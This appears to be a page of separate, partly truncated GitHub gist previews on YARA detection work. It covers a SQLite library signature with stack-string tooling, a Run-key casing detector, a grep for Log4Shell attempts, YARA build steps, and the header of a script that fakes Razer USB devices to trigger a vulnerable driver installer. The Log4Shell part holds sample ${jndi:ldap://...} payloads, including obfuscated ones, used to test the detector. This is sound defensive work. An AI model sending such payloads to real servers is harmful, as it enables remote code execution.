Today for #100DaysOfYARA I want to further explore one of my favorite topics:
"How to reliably detect libraries", or how to identify that a particular program has linked or otherwise included a particular library.
Detecting libraries (especially ones written in C) poses unique challenges compared to detecting malware, including:
- libraries tend to be platform/architecture nonspecific
- compilerisms overwhelm otherwise decent signal
- copy/pasta and groupthink across libraries
Today for #100DaysOfYARA I want to dive into some of the dirty secrets of creating/maintaining code-based YARA signatures.
Let's use SQLite3 as an example. Go get the source here (I prefer the amalgamation):
https://sqlite.org/download.html
I would like to reliably detect when a file is using SQLite. I often look at Windows executables, so I'm going to first concentrate on x86 programs that use this library. The easiest way to find them is to first concentrate on cleartext strings. In this case, I'm gonna pop over to VirusTotal and search for an easily-identifiable string:
content: "failed to allocate %u bytes of memory" type:pe
#!/usr/bin/env python3
import sys, string, struct

def strByByte(_strval):
    # yield the string one byte at a time (for byte-wise hex patterns)
    strval = bytearray(_strval.encode())
    for s in strval: yield s

def strByDword(_strval):
    # yield the string as little-endian 32-bit values, NUL-padded to a
    # multiple of four; the gist preview is cut off after the first line of
    # this function, so the body below is a completion, not the original
    strval = bytearray(_strval.encode())
    strval += b"\x00" * (-len(strval) % 4)
    for i in range(0, len(strval), 4):
        yield struct.unpack_from("<I", strval, i)[0]
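Added example (not part of the gist above): the cleartext string found on VirusTotal is the easy case. Once a compiler builds the same string on the stack, it becomes a run of 32-bit immediates, and a code-based signature has to match those instead. The block below takes a string, emits its dwords, wraps them in a YARA hex string that wildcards the stack displacement and tolerates interleaved instructions, and checks the result against constructed bytes without needing yara-python. The instruction encoding it relies on (`mov dword ptr [ebp+disp8], imm32` = `C7 45 disp8 imm32`) and the constructed code bytes are this example's own assumptions, not anything the gist states.

```python
import re
import struct

# Constructed sample: a cleartext string from the SQLite amalgamation that an
# optimizing compiler may also emit as 32-bit immediates when it builds the
# string on the stack. "mov dword ptr [ebp+disp8], imm32" encodes as
# C7 45 <disp8> <imm32>; that encoding is the assumption this example rests on.
SAMPLE = "failed to allocate %u bytes of memory"


def str_to_dwords(s: str) -> list:
    """Little-endian 32-bit values of s, NUL-padded to a multiple of four."""
    data = s.encode()
    data += b"\x00" * (-len(data) % 4)
    return [struct.unpack_from("<I", data, i)[0] for i in range(0, len(data), 4)]


def stack_string_hex(s: str, gap: int = 8) -> str:
    """YARA hex string for s written one dword at a time onto the stack.

    The displacement byte is wildcarded (??) so a different frame layout does
    not break the rule, and a [0-gap] jump between the movs tolerates
    instructions the compiler interleaves with the stores.
    """
    parts = []
    for dw in str_to_dwords(s):
        imm = struct.pack("<I", dw).hex(" ").upper()
        parts.append(f"C7 45 ?? {imm}")
    return "{ " + f" [0-{gap}] ".join(parts) + " }"


def yara_hex_to_regex(hexstr: str) -> "re.Pattern":
    """Translate the subset of YARA hex syntax used above (bytes, ??, [a-b])
    into a bytes regex so a candidate can be checked without yara-python."""
    out = []
    for tok in hexstr.strip().strip("{}").split():
        if tok == "??":
            out.append(b".")
        elif tok.startswith("["):
            lo, hi = tok.strip("[]").split("-")
            out.append(b".{%d,%d}" % (int(lo), int(hi)))
        else:
            out.append(re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(out), re.DOTALL)


def build_stack_string_code(s: str, base_disp: int = 0xD0) -> bytes:
    """Constructed stand-in for compiler output: one mov per dword with a
    two-byte filler (xor eax, eax) between them to mimic interleaving."""
    code = bytearray()
    for i, dw in enumerate(str_to_dwords(s)):
        code += b"\xC7\x45" + bytes([(base_disp + 4 * i) & 0xFF]) + struct.pack("<I", dw)
        code += b"\x31\xC0"
    return bytes(code)


def rule_text(name: str, s: str) -> str:
    """Wrap both forms, cleartext and stack-built, in one YARA rule."""
    return (
        f"rule {name}\n{{\n    strings:\n"
        f'        $clear = "{s}" ascii\n'
        f"        $stack = {stack_string_hex(s)}\n"
        f"    condition:\n        any of them\n}}\n"
    )


if __name__ == "__main__":
    print(rule_text("sqlite3_malloc_failed", SAMPLE))
```

The `[0-8]` gap is a judgement call: too small and an extra `mov` or `lea` between stores breaks the match, too large and the hex string gets slow and starts matching unrelated immediates. Tune it against the real compiler output you collected from the VirusTotal hits rather than against the constructed bytes here.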
rule general_win_runkey_casing_anomaly : General
{
    meta:
        author = "threatintel@volexity.com"
        description = "Looks for files containing a reference to the HKCU run key where the reference uses unusual casing."
        date = "2021-08-03"
        hash1 = "c20997c72508bc7340f4ec99fe9eb4f1ccde518e81bda66e7c86632f0748bffa"
        memory_suitable = 0
    strings:
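The rule's strings section is cut off above, so the following is an added illustration of the detection idea in the description, written for this page rather than taken from Volexity's rule: find every ASCII and UTF-16LE reference to the Run key case-insensitively, then flag the ones whose casing is not one a compiler-emitted literal would normally have. The set of "usual" casings and the sample buffers are this example's own assumptions; tune the set against a clean corpus before relying on it, and note, as the rule's `memory_suitable = 0` does, that this is a file signature, not something to run over process memory.

```python
import re

# The HKCU Run key as normally written. Registry paths are case-insensitive,
# so code that obfuscates or hand-assembles the string can carry a casing no
# compiler-emitted literal would have; that mismatch is the detection signal.
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Assumption (the rule's own strings section is not shown above): these
# spellings are common in legitimate binaries and are treated as "usual".
USUAL_CASINGS = {
    RUN_KEY,
    RUN_KEY.lower(),
    RUN_KEY.upper(),
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
}

# IGNORECASE on bytes patterns folds ASCII letters only, which is exactly
# what is wanted for both the narrow and the UTF-16LE (letter, NUL) form.
_ASCII_RE = re.compile(re.escape(RUN_KEY.encode()), re.IGNORECASE)
_WIDE_RE = re.compile(re.escape(RUN_KEY.encode("utf-16-le")), re.IGNORECASE)


def find_run_key_refs(data: bytes) -> list:
    """Every ASCII or UTF-16LE occurrence of the Run key, matched
    case-insensitively, as (offset, text_as_written, encoding)."""
    hits = []
    for m in _ASCII_RE.finditer(data):
        hits.append((m.start(), m.group().decode("ascii"), "ascii"))
    for m in _WIDE_RE.finditer(data):
        hits.append((m.start(), m.group().decode("utf-16-le"), "wide"))
    return sorted(hits)


def casing_anomalies(data: bytes) -> list:
    """Subset of the references whose casing is not in USUAL_CASINGS."""
    return [h for h in find_run_key_refs(data) if h[1] not in USUAL_CASINGS]


# Constructed samples, not real file contents.
CLEAN = (
    b"\x00" * 8
    + b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
    + "Software\\Microsoft\\Windows\\CurrentVersion\\Run".encode("utf-16-le")
)
SUSPICIOUS = (
    b"\x00" * 8
    + b"SoFtWaRe\\mIcRoSoFt\\WiNdOwS\\cUrReNtVeRsIoN\\rUn\x00"
    + "software\\Microsoft\\windows\\currentversion\\RUN".encode("utf-16-le")
)

if __name__ == "__main__":
    for off, text, enc in casing_anomalies(SUSPICIOUS):
        print(f"{off:#x} {enc}: {text}")
```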
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
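Added example, not part of the gist above: the same pattern run as a Python regex over a handful of constructed access-log lines, so you can see what the grep catches and what it misses. The first two hits are plain `${jndi:...}` payloads. The other three are forms seen during the Log4Shell wave that the grep pattern alone does not match: a fully URL-encoded payload (the pattern only tolerates `%7B` for the brace, not `%24` for the dollar sign) and nested lookups (`${lower:j}`, `${::-j}`) that hide the literal `jndi`. The `normalize()` step that decodes and collapses those forms is this example's own addition and covers only those forms; the 203.0.113.0/24 addresses and log lines are constructed. Remember also that the grep above only reads uncompressed files, so rotated `.gz` logs need `zgrep` or equivalent.

```python
import re
from urllib.parse import unquote

# The pattern from the grep command above, as a Python regex (grep -i => IGNORECASE).
PAGE_RE = re.compile(
    r"\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+",
    re.IGNORECASE,
)

# Lookup forms that evaluate to a single character in Log4j 2 and are used to
# hide the literal "jndi"; collapsing them is this example's own addition and
# only covers these forms, not every obfuscation seen in the wild.
_LOWER_UPPER_RE = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
_DEFAULT_RE = re.compile(r"\$\{::-([^{}]*)\}")


def normalize(line: str, rounds: int = 3) -> str:
    """URL-decode and collapse single-character lookups until stable."""
    for _ in range(rounds):
        new = unquote(line)
        new = _LOWER_UPPER_RE.sub(r"\1", new)
        new = _DEFAULT_RE.sub(r"\1", new)
        if new == line:
            break
        line = new
    return line


def grep_hits(lines: list) -> list:
    """Indexes of lines the grep pattern matches as-is."""
    return [i for i, l in enumerate(lines) if PAGE_RE.search(l)]


def scan_hits(lines: list) -> list:
    """Indexes of lines matched after normalization."""
    return [i for i, l in enumerate(lines) if PAGE_RE.search(normalize(l))]


# Constructed access-log lines (203.0.113.0/24 is a documentation range).
LOGS = [
    '203.0.113.9 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.5 - - "GET /?x=${jndi:ldap://203.0.113.5:1389/a} HTTP/1.1" 404 "-"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${jndi:ldaps://203.0.113.5/b}"',
    '203.0.113.5 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fc%7D HTTP/1.1" 200 "-"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://203.0.113.5/d}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.5/e}"',
]

if __name__ == "__main__":
    print("grep pattern alone:", grep_hits(LOGS))
    print("after normalization:", scan_hits(LOGS))
```

Treat the grep as a fast first pass for triage, not as proof of absence: a clean result on the raw pattern says nothing about encoded or nested payloads, which is why a second pass over normalized lines (or a broader pattern set) is worth the extra cost.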
/*
Goals for #100DaysofYARA:
better understanding of bitwise operators
use math module beyond general entropy of a section / resource
position specific things beyond what PE module tells us
do some funky stuff with hashing
*/
# Prerequisites (bootstrap.sh needs automake/libtool, so install these first)
sudo apt install automake libtool make gcc pkg-config libssl-dev
# Download YARA (Modify if a different version is needed)
# wget saves the archive under the URL's last path component (v4.1.2.tar.gz), so name it explicitly
wget -O yara-4.1.2.tar.gz https://github.com/VirusTotal/yara/archive/refs/tags/v4.1.2.tar.gz
tar -zxf yara-4.1.2.tar.gz
cd yara-4.1.2
./bootstrap.sh
# Build with make
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1